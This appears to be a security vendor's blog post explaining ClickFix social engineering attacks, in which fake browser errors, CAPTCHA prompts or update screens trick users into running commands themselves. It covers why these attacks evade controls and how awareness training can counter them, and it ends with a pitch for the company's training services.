ClickFix Attacks and the Rise of User-Initiated Compromise
User security awareness traditionally focuses on a narrow set of failure modes: things like don’t open unexpected email attachments or don’t enter your credentials into random websites. Those lessons have been drilled in repeatedly (and to a large extent, they’ve worked quite well). But with ClickFix attacks, there is a different social engineering exploitation at play.
ClickFix is an increasingly popular and effective social engineering technique that convinces users to solve an apparent problem that ultimately runs malicious code on their systems. This blog unpacks the mechanics of typical Clickfix campaigns and helps you decide on the best way for your business to prevent these attacks.
What Are Clickfix Attacks?
ClickFix campaigns typically present themselves as “quick fixes” for common computer issues like performance problems, missing drivers, browser errors, and verification failures. They entice the user to copy malicious code and run it on their computers.
The payloads that follow vary. Some lead to infostealers, while others deploy remote access tools or attempt to weaken security controls. But the delivery logic is always the same in that it attempts to persuade the victim to do the attacker’s work for them.
While the mechanics of ClickFix attacks are simple, the lures themselves vary. What they share is plausibility. Each one mimics a problem users already expect to encounter during routine computer use.
Common examples include:
- Fake web browser alerts hosted on compromised websites, often warning of security, performance, or rendering issues
- Spoofed CAPTCHA or human verification prompts, instructing users to complete an additional “step” to proceed
- Impersonated Windows update or system error screens, designed to look indistinguishable from legitimate OS workflows
- Browser instability or crash scenarios, sometimes deliberately induced, followed by instructions to “restore” functionality
- Driver, plugin, or compatibility warnings, framed as routine fixes for missing or outdated components
ClickFix-style attacks were first observed in March 2024, gaining significant momentum and widespread adoption mid-2024, with initially crude pop-ups on compromised sites. One example highlighted by Proofpoint from September 2024 was in German, targeting Swiss users of the e-commerce marketplace Ricardo. What has changed is not the underlying idea, but the quality and credibility of the presentation.
Attackers now invest heavily in visual accuracy, timing, and context. Fake Windows update screens closely mirror real system prompts. More advanced campaigns have used malicious browser extensions to deliberately crash Chrome, then present remediation steps that appear logical given the failure the user has just experienced.
What makes ClickFix attacks more than just another social engineering fad is how rapidly it has scaled across the threat landscape. According to telemetry in ESET’s H1 2025 Threat Report, ClickFix attacks increased by over 500% compared with the second half of 2024, rising from near zero to become the second most common attack vector after phishing and responsible for nearly 8% of all blocked attacks in that period.
Why ClickFix Attacks Work So Well
There are several reasons that together form a perfect storm for the ClickFix class of social engineering techniques and why they’re so effective.
They bypass controls by design
Many security controls are built to detect unauthorised activity. ClickFix generates authorised activity. Email gateways aren’t involved and malware scanners may have nothing to inspect. Endpoint tools can record the event, but the command itself is executed by the user through a trusted shell.
They’re efficient
ClickFix is efficient. Attackers don’t need zero-days or complex tooling. They need a convincing presentation and context. As those lures improve through better design, timing, and alignment with real workflows, the success rate increases without requiring a corresponding increase in technical sophistication. That asymmetry is why ClickFix has spread so quickly. It’s cheap to run, hard to spot, and effective across a wide range of environments.
The attacks impersonate systems, not people
ClickFix campaigns don’t impersonate a specific individual. They impersonate infrastructure: browsers, operating systems, update mechanisms, verification flows, and error states. That distinction matters.
Social engineering training often focuses on training users to question unexpected emails from people. They are far less likely to question instructions that appear to come from the system itself. A Windows update screen, a browser error, or a CAPTCHA-style prompt carries implicit authority because it mimics something the user encounters regularly.
They leverage legitimacy end-to-end
One of the most dangerous aspects of ClickFix is how legitimate it looks at every stage:
- The entry point may be a normal Google search
- The site may be a compromised but otherwise real domain
- The instructions may reference well-known software or vendors
- The action taken is deliberate and user-initiated
From the defender’s perspective, this produces activity that appears authorised and expected.
They exploit independence and helpfulness
What makes ClickFix campaigns particularly insidious is that they prey on traits organisations deliberately cultivate: independence, initiative, and problem-solving. Users are encouraged to unblock themselves, resolve minor issues quickly, and avoid unnecessary escalation to IT helpdesks. ClickFix weaponises that expectation.
By presenting both a plausible problem and an apparent solution, these lures create a sense of empowerment. The user is being asked to fix something. That dynamic reduces hesitation and makes reporting far less likely. From the user’s perspective, there’s no incident to flag; they’ve simply followed instructions and moved on. The user effectively infects the system themselves, using trusted tools and interfaces, in a way that looks intentional and legitimate.
Dealing with ClickFix Attacks
There are technical controls that can reduce exposure to ClickFix-style attacks. In tightly managed enterprise environments, admins can restrict access to system utilities, limit where executables can run from, or use Group Policy and endpoint controls to constrain how and where commands are executed.
In theory, these measures can narrow the blast radius, but in practice, they come with trade-offs. Many organisations rely on user autonomy to keep operations moving. Developers, engineers, and technical staff often need legitimate access to system tools. Overly restrictive policies risk breaking workflows, driving workarounds, or shifting risk elsewhere. More importantly, they don’t address the core problem of how these attacks exploit human behaviour.
Dealing with ClickFix ultimately means expanding what security awareness covers. Users need to understand that being asked to run commands, “complete verification,” or remediate issues outside established support channels is itself a risk signal. This is the case even when the request looks polished, familiar, or technically plausible. Without that understanding, no combination of endpoint or policy controls will reliably stop this class of attack.
If you want to improve the cybersecurity awareness level of your employees, DIESEC has options that include simulations of various phishing attacks and an information security awareness academy where users take short training courses on topics like ClickFix at regular intervals that are fun, engaging, and timely.
